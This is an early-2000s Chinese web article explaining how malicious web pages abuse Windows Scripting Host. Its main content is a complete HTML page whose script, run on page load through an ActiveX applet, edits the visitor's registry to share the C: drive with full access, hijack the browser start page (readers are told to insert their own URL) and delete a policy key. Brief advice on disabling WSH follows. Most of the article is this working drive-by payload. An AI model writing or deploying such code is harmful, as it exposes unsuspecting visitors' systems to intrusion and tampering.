网页病毒原来是这样产生的

网页病毒原来是这样产生的

发布时间：2003年03月27日 16:07

Windows Scripting Host ObjectReference--罪魁祸首？ Windows Scripting Host Object Reference，以下简称Wsh.在windows 9x的默认安装时都有的，我发现绝大多数上网用户都没有卸载它。 　　我从来没想到利用Wsh结合Javascript能写出如此厉害的网页病毒来。 　　先说说我写这文章的来由：我的一个朋友在访问重庆吻网(www.cqkiss.com)后，他以后每次启动机器在登陆对话框出现之前都会出现欢迎光临重庆吻网(www.cqkiss.com)的字样，由于平时对注册表的东西留意得比较多，我知道肯定是在注册表里改了什么设置。 　　由网页可以直接操纵注册表？我感到疑惑，但经过我的研究发现，事实上确实可以。 　　通过我的研究发现，Wsh的功能非常吓人，我们可以写出特定的页面，你在访问它之后可能出现如下后果： 　　1、删除你硬盘上的指定文件，创建和修改文本文件，autoexec.bat是文本文件吧。 　　我作了试验，确实可以修改它。 　 　　2、执行操作系统允许的任意程序； 　　3、把你的C盘设置为完全共享，然后别人可以在你的机器上安置木马。我在所举出的网页例子中，就实现了设置C盘为隐含的完全共享的功能。由于你的网站只涉及到注册表的操作，因此我在所举出的例子中就只包含了这一部分。别的如1和2所述的功能实现就不给出。 MSDN上关于wsh对注册表的操作说明： The following table describes the methods associated with the WshShell object. Method Description RegDelete --->Deletes a specified key or value from the registry. RegRead --> Returns a specified key or value from the registry. RegWrite --> Sets a specified key or value in the registry. 更详细的说明请自己参照MSDN上的说明 在下面的网页代码例子中，我只尝试了RegWrite和RegDelete两种方法的使用。 网页代码的例子： (注：/*...*/内的文字是我的说明，在实际的网页代码中应去掉。当然它的功能实现需要wsh的支持) /*index.htm文件内容如下：*/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0033)http://xxx.xxx.xxx/xxx.htm --> /*这一行好象必须要,意思不太明了*/ <HTML><HEAD><TITLE>这也叫网页，太恐怖了吧</TITLE> <SCRIPT> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f(){ try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); try { //设置访问该网页的机器的C盘为隐含的完全共享，设置原理请参照 //网络共享资源设置技巧一文 Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion //Network//LanMan//C//",""); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Flags",770,"REG_DWORD"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Parm1enc",0,"REG_BINARY"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Parm2enc",0,"REG_BINARY"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Path","C://"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Remark","ShareYour Disk C"); Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan //C//Type",0,"REG_DWORD"); //设置结束.客户机需要重新启动之后才能生效，你才能共享它的C盘。 //把你的主页设置为浏览器的默认主页也很简单，就下面一句 Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", "http://hongqt.lstc.edu.cn");/*那个http://hongqt.lstc.edu.cn是我自己的，你改为你自己的好了*/ //下面一句是取消对regedit.exe的限制使用。 Shl.RegDelete ("HKCU//Software//Microsoft//Windows//CurrentVersion //Policies//System//"); } catch(e) {} } catch(e) //*这两个catch(e)我不知道有什么用，但好象去掉它又不行*/ {} } function init() { setTimeout("f()", 1000); } init(); </SCRIPT> 为你作了一件好事--你现在可以使用Regedit.exe了。<br> 同时作了一件更大的坏事--把你的C盘完全共享了，请参照源代码消除它好了。<br> 如果你在上网前关掉了Windows script host，那么这个网页代码不会起作用。呵呵........ </BODY></HTML> 　　由此看来，上网真是一件很危险的事情？所以，我在上网前就先把那个Wsh给卸载掉了，就是在控制面板里选择“添加/删除程序”，再选择"windows安装程序"里的附件，再选择“详细资料”中的WindowsScripting Host,把它卸载掉就不用担心它来害你了，不过你作的网页上也不允许害别人哟。 　　你如果嫌麻烦就直接把c:/windows目录底下的一个叫Wshom.ocx的文件改名好了，我就是把它改为Wshom.ocx.old的。